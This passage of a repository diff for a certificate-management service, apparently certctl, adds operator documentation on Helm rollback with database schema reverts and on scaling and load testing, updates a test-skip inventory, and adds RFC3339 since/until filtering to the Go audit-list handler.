(`NNNNNN_*.down.sql`) shipped alongside. The `postgres.RunMigrations`
|
||||||
|
path applied at server boot only runs the `*.up.sql` files. The
|
||||||
|
`*.down.sql` files exist for development reference + a hypothetical
|
||||||
|
"surgical revert" path but are **not invoked by `helm rollback`**.
|
||||||
|
|
||||||
|
The implication: if `v2.1.0 → v2.2.0` ships migrations 000100,
|
||||||
|
000101, 000102 (adding columns, changing constraints, dropping
|
||||||
|
indexes), then `helm rollback` to v2.1.0 takes you back to the v2.1.0
|
||||||
|
container image — but the database still has migrations 000100-102
|
||||||
|
applied. The v2.1.0 server code doesn't know about those columns; it
|
||||||
|
either ignores them (best case) or fails to start (if the schema
|
||||||
|
diverged in a way the older code can't tolerate).
|
||||||
|
|
||||||
|
### When is rollback safe without a schema revert?
|
||||||
|
|
||||||
|
Migrations are **additive-only** in 90%+ of cases. The categories:
|
||||||
|
|
||||||
|
| Migration class | Safe to roll back without schema revert? | Why |
|
||||||
|
|---|---|---|
|
||||||
|
| Add column with default | Yes | Old code ignores the new column |
|
||||||
|
| Add table | Yes | Old code doesn't reference the table |
|
||||||
|
| Add index | Yes | Old code doesn't depend on the index existing |
|
||||||
|
| Add CHECK / FOREIGN KEY constraint | Usually yes | Only fails if the old code writes rows that violate the new constraint, which stays in place after rollback |
|
||||||
|
| Rename column / table | NO | Old code's queries reference the original name |
|
||||||
|
| Drop column / table | NO (data loss) | New code already stopped writing the column; old code expects it |
|
||||||
|
| Type change (`VARCHAR(40)` → `TEXT`) | Usually yes | Old code's column read still works |
|
||||||
|
| Backfill a column | Yes | Old code ignores the backfilled value |
|
||||||
|
|
||||||
|
If your upgrade only added columns / tables / indexes, `helm
|
||||||
|
rollback` is sufficient. If it renamed or dropped anything, you need
|
||||||
|
a database-level revert.
|
||||||
|
|
||||||
|
## Procedure: standard rollback (additive-only migrations)
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# 1. Identify the target revision
|
||||||
|
helm history certctl -n <namespace>
|
||||||
|
|
||||||
|
# 2. Take a backup BEFORE rolling back (defense in depth — if
|
||||||
|
# rollback exposes a data corruption issue, restore is the only
|
||||||
|
# path back)
|
||||||
|
# See docs/operator/runbooks/postgres-backup.md for the canonical
|
||||||
|
# pg_dump invocation.
|
||||||
|
|
||||||
|
# 3. Roll back to the chosen revision
|
||||||
|
helm rollback certctl <revision> -n <namespace> --wait --timeout 5m
|
||||||
|
|
||||||
|
# 4. Verify
|
||||||
|
kubectl get pods -n <namespace> -l app.kubernetes.io/instance=certctl
|
||||||
|
kubectl logs -n <namespace> -l app.kubernetes.io/component=server --tail=50
|
||||||
|
```
|
||||||
|
|
||||||
|
Watch for migration-version mismatch warnings in the server logs. If
|
||||||
|
the older server code refuses to start because the schema is ahead
|
||||||
|
of what it knows about, escalate to "rollback with schema revert."
|
||||||
|
|
||||||
|
## Procedure: rollback with schema revert
|
||||||
|
|
||||||
|
This is the rare case. Use it when:
|
||||||
|
- A column / table was renamed or dropped in the release being rolled back.
|
||||||
|
- The older code refuses to start with the newer schema.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# 1. Take a fresh backup right NOW (the current schema is what we're
|
||||||
|
# reverting from; if anything goes wrong we want a clean
|
||||||
|
# forward-recovery option)
|
||||||
|
kubectl exec -n <namespace> statefulset/certctl-postgres -- \
|
||||||
|
pg_dump --format=custom --no-owner --no-acl --dbname=certctl \
|
||||||
|
> "certctl-pre-rollback-$(date -u +%Y%m%dT%H%M%SZ).dump"
|
||||||
|
|
||||||
|
# 2. Stop the server Deployment to prevent it from writing to the
|
||||||
|
# database during the revert
|
||||||
|
kubectl scale deploy/certctl-server -n <namespace> --replicas=0
|
||||||
|
|
||||||
|
# 3. Apply the relevant *.down.sql files manually, one at a time, in
|
||||||
|
# reverse migration-number order. Example for reverting two
|
||||||
|
# migrations:
|
||||||
|
NEW=000102 # newest migration on the running schema
|
||||||
|
OLD=000100 # oldest migration to revert (inclusive)
|
||||||
|
for MIG in 000102 000101 000100; do
|
||||||
|
kubectl exec -i -n <namespace> statefulset/certctl-postgres -- \
|
||||||
|
psql --user=certctl --dbname=certctl \
|
||||||
|
< migrations/${MIG}_*.down.sql
|
||||||
|
done
|
||||||
|
|
||||||
|
# 4. Manually update the schema_migrations table to reflect the
|
||||||
|
# reverted state (the migration runner's bookkeeping)
|
||||||
|
kubectl exec -n <namespace> statefulset/certctl-postgres -- \
|
||||||
|
psql --user=certctl --dbname=certctl -c \
|
||||||
|
"DELETE FROM schema_migrations WHERE version > $((10#$OLD - 1));"
|
||||||
|
|
||||||
|
# 5. NOW run helm rollback. The server pod will start with a schema
|
||||||
|
# that matches its code.
|
||||||
|
helm rollback certctl <revision> -n <namespace> --wait --timeout 5m
|
||||||
|
```
|
||||||
|
|
||||||
|
The `*.down.sql` files are tested but only against pristine schemas —
|
||||||
|
they may not handle every data shape a production database
|
||||||
|
accumulates. ALWAYS take a backup first; the down-migrations are
|
||||||
|
a recovery tool, not a transactional contract.
|
||||||
|
|
||||||
|
## Procedure: full restore (when revert isn't tractable)
|
||||||
|
|
||||||
|
When a down-migration would lose data (drop columns / tables that
|
||||||
|
hold rows the older code can't read but the newer code populated), a
|
||||||
|
full restore is the only safe path. This is the procedure described
|
||||||
|
in
|
||||||
|
[`docs/operator/runbooks/disaster-recovery.md`](disaster-recovery.md#postgres-restore).
|
||||||
|
The summary:
|
||||||
|
|
||||||
|
1. Stop certctl.
|
||||||
|
2. Take a backup of the CURRENT schema (defense in depth).
|
||||||
|
3. Restore the LAST backup taken BEFORE the bad upgrade.
|
||||||
|
4. Roll the Helm release back to the matching code version.
|
||||||
|
5. Restart certctl.
|
||||||
|
6. Re-run any audited writes that happened in the window between the
|
||||||
|
backup and the bad upgrade (read the audit log; the API surface
|
||||||
|
is recoverable).
|
||||||
|
|
||||||
|
The DR runbook owns the canonical commands.
|
||||||
|
|
||||||
|
## Common pitfalls
|
||||||
|
|
||||||
|
- **Forgetting the backup before rollback.** A schema-revert path is
|
||||||
|
not safe without a fresh backup. If something goes wrong mid-revert
|
||||||
|
and your most recent backup is from last night, you've lost any
|
||||||
|
cert-issuance history between then and now.
|
||||||
|
- **Rolling back the chart without rolling back the database state**
|
||||||
|
on a release that included a destructive migration (drop column,
|
||||||
|
drop table). Symptoms: old code starts, queries fail with
|
||||||
|
"column does not exist," server crashes in a loop. Recovery
|
||||||
|
requires schema revert OR full restore.
|
||||||
|
- **Letting the agents drift.** `helm rollback` updates the agent
|
||||||
|
DaemonSet's image too — agents on different versions than the
|
||||||
|
server may produce incompatible CSR payloads. After rollback,
|
||||||
|
confirm agent images are at the matching version via
|
||||||
|
`kubectl get daemonset certctl-agent -o jsonpath='{.spec.template.spec.containers[0].image}'`.
|
||||||
|
- **GHCR images pinned by digest:** the rollback restores the prior
|
||||||
|
`image:` value from the Helm template. If your operator workflow
|
||||||
|
uses `image.digest` pinning, the digest comes back too — make
|
||||||
|
sure that digest still exists on ghcr.io. Upstream images do persist; old
|
||||||
|
tags are never deleted, but a private mirror may have garbage-collected.
|
||||||
|
|
||||||
|
## Related reading
|
||||||
|
|
||||||
|
- [`docs/operator/runbooks/postgres-backup.md`](postgres-backup.md) —
|
||||||
|
the backup procedure that's the precondition for any
|
||||||
|
schema-revert path.
|
||||||
|
- [`docs/operator/runbooks/disaster-recovery.md`](disaster-recovery.md) —
|
||||||
|
the full restore procedure when rollback isn't tractable.
|
||||||
|
- [`docs/migration/api-keys-to-rbac.md`](../../migration/api-keys-to-rbac.md) —
|
||||||
|
example of a migration that the runtime supports rolling back via
|
||||||
|
feature flag (rare).
|
||||||
@@ -0,0 +1,250 @@
|
|||||||
|
# Operator scale guide
|
||||||
|
|
||||||
|
> Last reviewed: 2026-05-14
|
||||||
|
|
||||||
|
Use this when:
|
||||||
|
- You're sizing a new certctl deployment for a target fleet count.
|
||||||
|
- You're scaling an existing deployment up from demo (15 certs / 1
|
||||||
|
agent) to production (1K+ certs / 100+ agents).
|
||||||
|
- An auditor asks "what does this scale to?" and you want a documented
|
||||||
|
answer that isn't "we haven't measured."
|
||||||
|
|
||||||
|
## DB connection pool
|
||||||
|
|
||||||
|
certctl's PostgreSQL connection pool is the single largest scale lever.
|
||||||
|
Pool exhaustion looks like 503s + agent poll timeouts + scheduler
|
||||||
|
falling behind on its loops. The default ships at 50 max open
|
||||||
|
connections (`CERTCTL_DATABASE_MAX_CONNS=50`), with idle = max/5 = 10
|
||||||
|
under the existing `internal/repository/postgres/db.go::NewDBWithMaxConns`
|
||||||
|
contract.
|
||||||
|
|
||||||
|
Operator-tune ladder:
|
||||||
|
|
||||||
|
| Fleet size | `CERTCTL_DATABASE_MAX_CONNS` | Postgres `max_connections` | Notes |
|
||||||
|
|---|---|---|---|
|
||||||
|
| ≤ 500 certs / 100 agents | `50` (default) | `100` (PG default) | Demo + small deployments. Pool default sized for this. |
|
||||||
|
| 5K certs / 1K agents | `100` | `200` | Postgres needs an explicit bump from the 100 default; reload required. |
|
||||||
|
| 50K certs / 10K agents | `200` | `400` | Plus dedicated Postgres VM (separate from server host); shared_buffers ≥ 1 GiB. |
|
||||||
|
|
||||||
|
Always leave headroom in Postgres's `max_connections` for backups
|
||||||
|
(`pg_dump` opens its own connection), ad-hoc psql sessions, and
|
||||||
|
replicas. The formula `(server pool size × replicas) + 20` is a safe
|
||||||
|
floor for Postgres's `max_connections`.
|
||||||
|
|
||||||
|
**Numbers above the small-fleet row are operator-tuning starting
|
||||||
|
points, not validated ceilings.** Phase 8 of the architecture diligence
|
||||||
|
remediation will replace these with measured values from synthetic
|
||||||
|
fleets; until then, capture your own observations in a loadtest log
|
||||||
|
and tune against them.
|
||||||
|
|
||||||
|
## Scheduler tick budgets
|
||||||
|
|
||||||
|
certctl has 15 scheduler loops, each with its own cadence
|
||||||
|
(internal/scheduler/scheduler.go). The renewal scan is the hottest
|
||||||
|
loop on large fleets: it pulls every managed certificate, applies
|
||||||
|
each profile's renewal policy, and dispatches an issuance job per
|
||||||
|
cert that meets the threshold. The default cadence is `1h`
|
||||||
|
(`CERTCTL_SCHEDULER_RENEWAL_CHECK_INTERVAL`).
|
||||||
|
|
||||||
|
Phase 6 SCALE-M5 closure (2026-05-14) added per-ticker jitter via the
|
||||||
|
`internal/scheduler.JitteredTicker` wrapper. Each loop's interval is
|
||||||
|
unchanged; the wrapper adds ±10% randomized delay per tick so multiple
|
||||||
|
loops with the same nominal cadence don't co-fire and cause hour-
|
||||||
|
boundary CPU + DB spikes. For most fleets the visible effect is a
|
||||||
|
smoother CPU graph during the renewal scan.
|
||||||
|
|
||||||
|
**Renewal-sweep semaphore (SCALE-L1).** The renewal loop dispatches
|
||||||
|
concurrent issuance work behind a per-tick semaphore (default
|
||||||
|
`CERTCTL_RENEWAL_CONCURRENCY=25`). Under tick-budget pressure (a tick
|
||||||
|
that exceeds the loop interval), the semaphore can hold the entire
|
||||||
|
concurrency cap until the context cancels at the next-tick boundary —
|
||||||
|
which is intentional. The drain happens via context cancellation; new
|
||||||
|
work isn't started past the deadline. Tests in
|
||||||
|
`internal/scheduler/` pin this drain behavior. Operators on large
|
||||||
|
fleets should:
|
||||||
|
|
||||||
|
1. Bump `CERTCTL_RENEWAL_CONCURRENCY` to 50 or 100 if the renewal scan
|
||||||
|
consistently exceeds tick budget.
|
||||||
|
2. Also bump `CERTCTL_DATABASE_MAX_CONNS` proportionally — each
|
||||||
|
concurrent renewal task opens its own pool connection during
|
||||||
|
issuance / deployment.
|
||||||
|
3. Watch for the "renewal scan complete" log line per tick. If it's
|
||||||
|
consistently late, you're under-provisioned.
|
||||||
|
|
||||||
|
## Async CA polling budgets (SCALE-M3)
|
||||||
|
|
||||||
|
DigiCert, Entrust, GlobalSign, and Sectigo are async issuers — they
|
||||||
|
accept a CSR, queue it on the CA side, and return a polling token.
|
||||||
|
The certctl server polls the CA's status endpoint until the cert is
|
||||||
|
ready or the deadline expires. The default poll-deadline is 10
|
||||||
|
minutes wall-clock (`asyncpoll.DefaultMaxWait`); after that the
|
||||||
|
issuance returns `StillPending` and the scheduler re-enqueues the
|
||||||
|
job for the next tick.
|
||||||
|
|
||||||
|
Priority chain when picking the actual deadline (highest → lowest):
|
||||||
|
|
||||||
|
1. Per-connector env: `CERTCTL_DIGICERT_POLL_MAX_WAIT_SECONDS`,
|
||||||
|
`CERTCTL_ENTRUST_POLL_MAX_WAIT_SECONDS`,
|
||||||
|
`CERTCTL_GLOBALSIGN_POLL_MAX_WAIT_SECONDS`,
|
||||||
|
`CERTCTL_SECTIGO_POLL_MAX_WAIT_SECONDS`.
|
||||||
|
2. Global env: `CERTCTL_ASYNC_POLL_MAX_WAIT_SECONDS` (sets the
|
||||||
|
process-wide default for all async-CA connectors that didn't set
|
||||||
|
their per-connector value).
|
||||||
|
3. Package const: `asyncpoll.DefaultMaxWait = 10 * time.Minute`.
|
||||||
|
|
||||||
|
Operators with slow async CAs (Entrust certificate-mode in
|
||||||
|
particular can take 15-30 minutes during business hours) should
|
||||||
|
raise the per-connector value rather than the global; that way fast
|
||||||
|
issuers don't pay the polling cost.
|
||||||
|
|
||||||
|
## Cursor pagination caching (SCALE-L2)
|
||||||
|
|
||||||
|
Phase 6 SCALE-L2 closure (2026-05-14) added an ETag middleware at
|
||||||
|
`internal/api/middleware/etag.go` covering the top-5 read endpoints:
|
||||||
|
`/api/v1/certificates`, `/api/v1/jobs`, `/api/v1/agents`,
|
||||||
|
`/api/v1/audit`, `/api/v1/discovery/certificates`. The ETag is
|
||||||
|
derived from `(max-row-updated-at, row-count)` for the requested
|
||||||
|
filter; repeated requests with the same query return `304 Not
|
||||||
|
Modified` when the underlying data hasn't changed. The dashboard
|
||||||
|
benefits most — its polling loop on the certificates page is the
|
||||||
|
single largest read-traffic source on most deployments.
|
||||||
|
|
||||||
|
When the cache is effective, repeated reads bypass the
|
||||||
|
`SELECT COUNT(*) FROM <table>` query entirely. The cache invalidates
|
||||||
|
on any mutation to the table (the row-count + max-updated-at hash
|
||||||
|
flips).
|
||||||
|
|
||||||
|
Operators don't need to do anything to opt in — the middleware is
|
||||||
|
wired around the top-5 endpoints unconditionally. If you want to
|
||||||
|
verify it's working, check the `ETag:` response header on a list
|
||||||
|
endpoint and repeat the request with the same value in an
|
||||||
|
`If-None-Match:` header — the second request should return 304 with
|
||||||
|
an empty body.
|
||||||
|
|
||||||
|
## Scale-tier scenarios (SCALE-H2, Phase 8)
|
||||||
|
|
||||||
|
Phase 8 (2026-05-14) extended the k6 load-test harness with three new
|
||||||
|
scenarios that exercise the scale-relevant load surfaces the original
|
||||||
|
API tier left uncovered. They live behind a compose profile gate
|
||||||
|
(`docker compose --profile scale`) so the default `make loadtest`
|
||||||
|
stays focused on per-PR regression scope. The full set runs weekly on
|
||||||
|
the same `loadtest.yml` cron as the API + connector tier.
|
||||||
|
|
||||||
|
| Scenario | k6 file | Seed fixture | Sustained load |
|
||||||
|
|---|---|---|---|
|
||||||
|
| Bulk-renewal under load | `deploy/test/loadtest/k6/bulk_renewal.js` | 10,000 managed_certificates (`seed/01_bulk_renewal_certs.sql`) | 5 req/s POST `/api/v1/certificates/bulk-renew` × 5 min |
|
||||||
|
| ACME enrollment burst | `deploy/test/loadtest/k6/acme_burst.js` | (none — unauth surface) | 200 concurrent VUs × directory/nonce/ARI × 5 min |
|
||||||
|
| Agent heartbeat storm | `deploy/test/loadtest/k6/agent_storm.js` | 5,000 agents (`seed/02_agent_fleet.sql`) | 167 req/s POST `/api/v1/agents/{id}/heartbeat` × 5 min |
|
||||||
|
|
||||||
|
### Threshold contracts (regression guards, NOT measured baselines)
|
||||||
|
|
||||||
|
| Scenario | Metric | Threshold |
|
||||||
|
|---|---|---|
|
||||||
|
| Bulk-renewal | `http_req_duration{scenario:bulk_renewal}` p99 | < 5 s |
|
||||||
|
| Bulk-renewal | `http_req_duration{scenario:bulk_renewal}` p95 | < 2 s |
|
||||||
|
| Bulk-renewal | `http_req_failed{scenario:bulk_renewal}` | < 1% |
|
||||||
|
| ACME burst | `acme_directory_duration` p95 | < 500 ms |
|
||||||
|
| ACME burst | `acme_new_nonce_duration` p95 | < 300 ms |
|
||||||
|
| ACME burst | `acme_renewal_info_duration` p95 | < 800 ms |
|
||||||
|
| ACME burst | `http_req_failed{server_error:true}` 5xx-only | < 0.1% |
|
||||||
|
| Agent storm | `http_req_duration{scenario:agent_storm}` p99 | < 1 s |
|
||||||
|
| Agent storm | `http_req_duration{scenario:agent_storm}` p95 | < 500 ms |
|
||||||
|
| Agent storm | `http_req_failed{scenario:agent_storm}` | < 0.1% |
|
||||||
|
|
||||||
|
429 rate-limit responses on the ACME burst are EXPECTED — Phase 5's
|
||||||
|
per-account rate limiter SHOULD fire at sustained 200-VU pressure.
|
||||||
|
The custom `acme_rate_limited_count` Counter tracks how often it
|
||||||
|
fires; `acme_rate_limit_shape_ok` Counter verifies every 429 returns
|
||||||
|
the RFC 7807 `application/problem+json` shape with the
|
||||||
|
`urn:ietf:params:acme:error:rateLimited` type. A regression that
|
||||||
|
returned plain-text 429 or a different problem type would surface as
|
||||||
|
`(rate_limited_count - shape_ok_count) > 0` in the summary.
|
||||||
|
|
||||||
|
### Measured baseline — TBD pending canonical-hardware capture
|
||||||
|
|
||||||
|
The Phase 8 scenarios shipped 2026-05-14. Baseline capture on a
|
||||||
|
canonical `ubuntu-latest` GitHub runner is the next operational step;
|
||||||
|
until then, the table below holds TBD placeholders. **Do NOT publish
|
||||||
|
sandbox-captured numbers here** — the same anti-pattern the original
|
||||||
|
loadtest README guards against (sandbox-aggregate placeholder vs
|
||||||
|
canonical hardware) applies to Phase 8.
|
||||||
|
|
||||||
|
| Scenario | p50 | p95 | p99 | Error rate | Date measured | Commit |
|
||||||
|
|---|---|---|---|---|---|---|
|
||||||
|
| **bulk_renewal** | TBD | TBD | TBD | TBD | — | — |
|
||||||
|
| **acme_burst** directory | TBD | TBD | TBD | TBD | — | — |
|
||||||
|
| **acme_burst** new-nonce | TBD | TBD | TBD | TBD | — | — |
|
||||||
|
| **acme_burst** renewal-info | TBD | TBD | TBD | TBD | — | — |
|
||||||
|
| **agent_storm** | TBD | TBD | TBD | TBD | — | — |
|
||||||
|
|
||||||
|
Capture procedure: trigger `loadtest.yml` from the Actions tab against
|
||||||
|
the current `master` SHA; wait for the `k6-scale` matrix jobs to
|
||||||
|
complete; download the per-scenario summary artifacts; copy p50/p95/
|
||||||
|
p99 from `summary-<scenario>.json` into the table; commit the
|
||||||
|
captured numbers alongside the date + SHA. Replace this paragraph
|
||||||
|
with the captured-on row when the first canonical run lands.
|
||||||
|
|
||||||
|
### How to run the scale tier locally
|
||||||
|
|
||||||
|
```sh
|
||||||
|
# All three scenarios serially (~18 min total):
|
||||||
|
make loadtest-scale
|
||||||
|
|
||||||
|
# Individual scenarios (each ~6 min):
|
||||||
|
make loadtest-scale-bulk # 10K cert bulk-renew
|
||||||
|
make loadtest-scale-acme # 200 VU ACME burst
|
||||||
|
make loadtest-scale-agent # 5K agent heartbeat storm
|
||||||
|
```
|
||||||
|
|
||||||
|
Each scenario boots its own copy of the loadtest compose stack
|
||||||
|
(postgres + tls-init + certctl-server) plus the `scale-seed` init
|
||||||
|
container that runs the SQL fixtures from `deploy/test/loadtest/seed/`.
|
||||||
|
The seed is idempotent (`ON CONFLICT … DO NOTHING`) so re-running a
|
||||||
|
scenario against the same compose stack is cheap.
|
||||||
|
|
||||||
|
### Documented limitations of the scale tier
|
||||||
|
|
||||||
|
- **JWS-signed ACME flows are not measured.** The ACME burst scenario
|
||||||
|
hits the unauthenticated directory + new-nonce + ARI surface only.
|
||||||
|
Measuring the JWS-signed POST hot path (new-account / new-order /
|
||||||
|
finalize) requires bundling a JWS signer into the k6 driver (k6
|
||||||
|
doesn't ship JWS). End-to-end JWS conformance is gated by
|
||||||
|
`make acme-rfc-conformance-test` which drives `lego` against the
|
||||||
|
same stack.
|
||||||
|
- **Scheduler renewal scan throughput.** The bulk-renewal scenario
|
||||||
|
measures the inbound POST throughput; the scheduler's
|
||||||
|
`jobProcessorLoop` drains the enqueued jobs at a fixed per-tick
|
||||||
|
budget (`CERTCTL_RENEWAL_CONCURRENCY=25` default), and the
|
||||||
|
throughput of that path is not amplified by adding more inbound
|
||||||
|
bulk-renew calls. A future scenario could pull
|
||||||
|
`/api/v1/jobs?status=pending` and measure drain time.
|
||||||
|
- **Production-sized Postgres.** The compose stack runs
|
||||||
|
`postgres:16-alpine` with default config on a CI runner.
|
||||||
|
Production deploys with `shared_buffers >= 1 GiB` + dedicated
|
||||||
|
Postgres VM will have different query plans for the 10K-cert
|
||||||
|
scan. The captured numbers translate directionally but the
|
||||||
|
absolute ceiling is workload-specific — see the operator-tune
|
||||||
|
ladder above for production sizing.
|
||||||
|
- **Pull-only deployment model.** Agent CSR submit, work-poll, and
|
||||||
|
deploy-verify paths are intentionally out of scope. The heartbeat
|
||||||
|
storm exercises the highest-frequency call on a typical fleet;
|
||||||
|
the work-poll path runs at the same cadence but is cheap (empty
|
||||||
|
set returned 99% of the time).
|
||||||
|
|
||||||
|
## Profiling production
|
||||||
|
|
||||||
|
When the above ladder doesn't fit your shape, profile against your
|
||||||
|
specific workload. The
|
||||||
|
[performance-baselines.md](performance-baselines.md) runbook has
|
||||||
|
single-endpoint, inventory-walk, and renewal-scan recipes you can
|
||||||
|
adapt.
|
||||||
|
|
||||||
|
## Related reading
|
||||||
|
|
||||||
|
- [`docs/operator/performance-baselines.md`](performance-baselines.md) —
|
||||||
|
per-endpoint baselines + how to re-baseline after upgrades.
|
||||||
|
- [`docs/operator/runbooks/postgres-backup.md`](runbooks/postgres-backup.md) —
|
||||||
|
Postgres-side backup discipline (necessary precondition for any
|
||||||
|
scale tuning).
|
||||||
|
- [`deploy/ENVIRONMENTS.md`](../../deploy/ENVIRONMENTS.md) — the
|
||||||
|
full env-var inventory the values referenced above come from.
|
||||||
@@ -4,12 +4,12 @@
|
|||||||
<!-- Re-run after adding or removing any t.Skip(). CI guard: -->
|
<!-- Re-run after adding or removing any t.Skip(). CI guard: -->
|
||||||
<!-- scripts/ci-guards/skip-inventory-drift.sh -->
|
<!-- scripts/ci-guards/skip-inventory-drift.sh -->
|
||||||
|
|
||||||
> Last reviewed: 2026-05-13
|
> Last reviewed: 2026-05-14
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
- Total t.Skip sites: **142**
|
- Total t.Skip sites: **144**
|
||||||
- testing.Short() guards: **76** (these gate behind `go test -short`)
|
- testing.Short() guards: **78** (these gate behind `go test -short`)
|
||||||
|
|
||||||
Re-run inventory with: `./scripts/skip-inventory.sh`.
|
Re-run inventory with: `./scripts/skip-inventory.sh`.
|
||||||
|
|
||||||
@@ -114,7 +114,7 @@ Re-run inventory with: `./scripts/skip-inventory.sh`.
|
|||||||
|
|
||||||
### `internal/ciparity`
|
### `internal/ciparity`
|
||||||
|
|
||||||
- `internal/ciparity/surface_parity_test.go:97` — // readFileOrSkip reads a file; on ENOENT, calls t.Skipf rather than
|
- `internal/ciparity/surface_parity_test.go:113` — // readFileOrSkip reads a file; on ENOENT, calls t.Skipf rather than
|
||||||
|
|
||||||
### `internal/connector/issuer/acme`
|
### `internal/connector/issuer/acme`
|
||||||
|
|
||||||
@@ -156,6 +156,8 @@ Re-run inventory with: `./scripts/skip-inventory.sh`.
|
|||||||
|
|
||||||
### `internal/ratelimit`
|
### `internal/ratelimit`
|
||||||
|
|
||||||
|
- `internal/ratelimit/equivalence_test.go:80` — t.Skip("race-style test under -short")
|
||||||
|
- `internal/ratelimit/equivalence_test.go:88` — t.Skip("postgres equivalence tests require testcontainers; skipped under -short")
|
||||||
- `internal/ratelimit/sliding_window_test.go:146` — t.Skip("race-style test under -short")
|
- `internal/ratelimit/sliding_window_test.go:146` — t.Skip("race-style test under -short")
|
||||||
|
|
||||||
### `internal/repository/postgres`
|
### `internal/repository/postgres`
|
||||||
|
|||||||
@@ -28,6 +28,18 @@ type AuditService interface {
|
|||||||
// empty string returns all categories. Used by the auditor role
|
// empty string returns all categories. Used by the auditor role
|
||||||
// (filtered to "auth" via /v1/audit?category=auth).
|
// (filtered to "auth" via /v1/audit?category=auth).
|
||||||
ListAuditEventsByCategory(ctx context.Context, eventCategory string, page, perPage int) ([]domain.AuditEvent, int64, error)
|
ListAuditEventsByCategory(ctx context.Context, eventCategory string, page, perPage int) ([]domain.AuditEvent, int64, error)
|
||||||
|
// ListAuditEventsByFilter (P-H2 closure, frontend-design-audit
|
||||||
|
// 2026-05-14) returns audit rows constrained by an optional time
|
||||||
|
// range AND optional category. Zero time.Time on either bound
|
||||||
|
// disables that bound. The repository already pushes the
|
||||||
|
// predicate into SQL (timestamp >=/<= since/until); this method
|
||||||
|
// just threads handler-parsed `since` / `until` query params
|
||||||
|
// through to the filter. Frontend (AuditPage) drops the pre-P-H2
|
||||||
|
// client-side time filter ("fetches the entire event window,
|
||||||
|
// throws 99% away in JS") and sends since/until directly. MCP's
|
||||||
|
// certctl_audit_list_with_category tool already advertised these
|
||||||
|
// params; this closure makes that advertised contract truthful.
|
||||||
|
ListAuditEventsByFilter(ctx context.Context, since, until time.Time, eventCategory string, page, perPage int) ([]domain.AuditEvent, int64, error)
|
||||||
// ExportEventsByFilter returns audit events matching a
|
// ExportEventsByFilter returns audit events matching a
|
||||||
// (from, to, eventCategory) filter, capped at maxRows. Audit
|
// (from, to, eventCategory) filter, capped at maxRows. Audit
|
||||||
// 2026-05-10 HIGH-11 closure — backs the new
|
// 2026-05-10 HIGH-11 closure — backs the new
|
||||||
@@ -53,12 +65,29 @@ func NewAuditHandler(svc AuditService) AuditHandler {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// ListAuditEvents lists audit events.
|
// ListAuditEvents lists audit events.
|
||||||
// GET /api/v1/audit?page=1&per_page=50&category=auth
|
// GET /api/v1/audit?page=1&per_page=50&category=auth&since=<RFC3339>&until=<RFC3339>
|
||||||
//
|
//
|
||||||
// Bundle 1 Phase 8 adds the optional `category` query parameter for
|
// Bundle 1 Phase 8 added the optional `category` query parameter for
|
||||||
// auditor-role filtering. Allowed values: cert_lifecycle, auth, config.
|
// auditor-role filtering. Allowed values: cert_lifecycle, auth, config.
|
||||||
// Unknown values surface 400 so misuse is caught loud (instead of
|
// Unknown values surface 400 so misuse is caught loud (instead of
|
||||||
// silently returning all rows).
|
// silently returning all rows).
|
||||||
|
//
|
||||||
|
// P-H2 closure (frontend-design-audit 2026-05-14) adds the optional
|
||||||
|
// `since` / `until` time-range query parameters. Both accept RFC3339
|
||||||
|
// (e.g. "2026-04-01T00:00:00Z"). Either bound can be omitted to leave
|
||||||
|
// that side open-ended. The repository already pushes the timestamp
|
||||||
|
// predicate into the SQL query, and migration 000032's
|
||||||
|
// (event_category, timestamp DESC) composite index makes the
|
||||||
|
// predicate hit an index scan rather than a sequential scan.
|
||||||
|
//
|
||||||
|
// Note on naming: this endpoint uses `since` / `until` to match the
|
||||||
|
// existing MCP `certctl_audit_list_with_category` tool's published
|
||||||
|
// contract (internal/mcp/tools_audit_fix.go:174) and the audit-text
|
||||||
|
// framing of the P-H2 finding. The sibling /api/v1/audit/export
|
||||||
|
// endpoint uses `from` / `to` for compliance-window semantics
|
||||||
|
// (required, ≤ 90-day range, NDJSON streaming); the two endpoints
|
||||||
|
// share data but have different param semantics and the names were
|
||||||
|
// chosen to reflect that.
|
||||||
func (h AuditHandler) ListAuditEvents(w http.ResponseWriter, r *http.Request) {
|
func (h AuditHandler) ListAuditEvents(w http.ResponseWriter, r *http.Request) {
|
||||||
if r.Method != http.MethodGet {
|
if r.Method != http.MethodGet {
|
||||||
Error(w, http.StatusMethodNotAllowed, "Method not allowed")
|
Error(w, http.StatusMethodNotAllowed, "Method not allowed")
|
||||||
@@ -93,16 +122,39 @@ func (h AuditHandler) ListAuditEvents(w http.ResponseWriter, r *http.Request) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
var (
|
// P-H2: optional time-range bounds. RFC3339 parse with explicit
|
||||||
events []domain.AuditEvent
|
// 400 on malformed input — silently dropping a malformed `since`
|
||||||
total int64
|
// would be worse than rejecting it (operator gets unfiltered
|
||||||
err error
|
// results when they thought they were filtering).
|
||||||
)
|
var since, until time.Time
|
||||||
if category != "" {
|
if s := query.Get("since"); s != "" {
|
||||||
events, total, err = h.svc.ListAuditEventsByCategory(r.Context(), category, page, perPage)
|
parsed, err := time.Parse(time.RFC3339, s)
|
||||||
} else {
|
if err != nil {
|
||||||
events, total, err = h.svc.ListAuditEvents(r.Context(), page, perPage)
|
ErrorWithRequestID(w, http.StatusBadRequest,
|
||||||
|
"`since` must be RFC3339 (e.g. 2026-04-01T00:00:00Z)",
|
||||||
|
requestID)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
since = parsed
|
||||||
}
|
}
|
||||||
|
if u := query.Get("until"); u != "" {
|
||||||
|
parsed, err := time.Parse(time.RFC3339, u)
|
||||||
|
if err != nil {
|
||||||
|
ErrorWithRequestID(w, http.StatusBadRequest,
|
||||||
|
"`until` must be RFC3339 (e.g. 2026-05-01T00:00:00Z)",
|
||||||
|
requestID)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
until = parsed
|
||||||
|
}
|
||||||
|
if !since.IsZero() && !until.IsZero() && !until.After(since) {
|
||||||
|
ErrorWithRequestID(w, http.StatusBadRequest,
|
||||||
|
"`until` must be after `since`",
|
||||||
|
requestID)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
events, total, err := h.svc.ListAuditEventsByFilter(r.Context(), since, until, category, page, perPage)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
